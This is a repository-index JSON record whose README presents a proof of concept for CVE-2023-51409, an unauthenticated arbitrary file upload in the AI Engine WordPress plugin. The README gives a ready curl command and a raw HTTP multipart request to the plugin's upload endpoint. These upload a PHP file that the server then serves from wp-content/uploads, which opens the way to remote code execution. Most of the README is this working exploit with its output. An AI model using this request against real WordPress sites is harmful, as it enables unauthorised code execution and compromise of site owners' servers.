{"id":21125695,"url":"https://github.com/randomrobbiebf/cve-2023-51409","last_synced_at":"2026-03-19T19:01:20.238Z","repository":{"id":223903298,"uuid":"761865974","full_name":"RandomRobbieBF/CVE-2023-51409","owner":"RandomRobbieBF","description":"AI Engine: ChatGPT Chatbot \u003c= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload","archived":false,"fork":false,"pushed_at":"2024-02-22T16:29:56.000Z","size":2,"stargazers_count":1,"open_issues_count":0,"forks_count":2,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-09-22T14:02:24.179Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-02-22T16:26:57.000Z","updated_at":"2024-07-11T16:38:49.000Z","dependencies_parsed_at":null,"dependency_job_id":"52d3cf9a-c652-4738-a902-2d62d8e11863","html_url":"https://github.com/RandomRobbieBF/CVE-2023-51409","commit_stats":null,"previous_names":["randomrobbiebf/cve-2023-51409"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/RandomRobbieBF/CVE-2023-51409","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/re
positories/RandomRobbieBF%2FCVE-2023-51409/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2023-51409/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2023-51409/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29329852,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T06:13:03.264Z","status":"ssl_error","status_checked_at":"2026-02-11T06:12:55.843Z","response_time":97,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:25.270Z","updated_at":"2026-02-11T08:33:40.101Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2023-51409\nAI Engine: ChatGPT Chatbot \u003c= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload\n\n\n### Description:\nThe AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. 
This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n\n```\nSeverity: critical\nCVE ID: CVE-2023-51409\nCVSS Score: 9.8\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\nPlugin Slug: ai-engine\nWPScan URL: https://www.wpscan.com/plugin/ai-engine\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod\n```\n\nPOC\n---\nCURL\n```\n$ cat test.txt\nrobbie.txt\n$ curl -X POST http://wordpress.lan/wp-json/mwai-ui/v1/files/upload -H \"Content-Disposition: form-data; filename=\\\"test.txt\\\"\" -F \"file=@test.txt\" | jq -r\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602\n{\n  \"success\": true,\n  \"data\": {\n    \"id\": \"dc05affbc88c6d731a8fc6d122cd3839\",\n    \"url\": \"http://wordpress.lan/wp-content/uploads/2024/02/test-1.txt\"\n  }\n}\n\n$ curl http://wordpress.lan/wp-content/uploads/2024/02/test-1.txt\nrobbie.txt\n```\n\nRAW HTTP\n---\nRequest\n\n```\nPOST /wp-json/mwai-ui/v1/files/upload HTTP/1.1\nHost: wordpress.lan\nUser-Agent: curl/8.1.2\nAccept: */*\nContent-Disposition: form-data; filename=\"test.txt\"\nContent-Length: 206\nContent-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4\nConnection: close\n\n--------------------------8ecd2b831e8d20f4\nContent-Disposition: form-data; name=\"file\"; filename=\"test.php\"\nContent-Type: text/plain\n\n\u003c?php phpinfo(); ?\u003e\n\n--------------------------8ecd2b831e8d20f4--\n```\n\nResponse\n```\n{\n  \"data\": {\n    \"id\": \"1044f1ab4f6340fea9abecb331fe981c\",\n    \"url\": \"http://wordpress.lan/wp-content/uploads/2024/02/test.php\"\n  },\n  \"success\": 
true\n}\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2023-51409/lists"}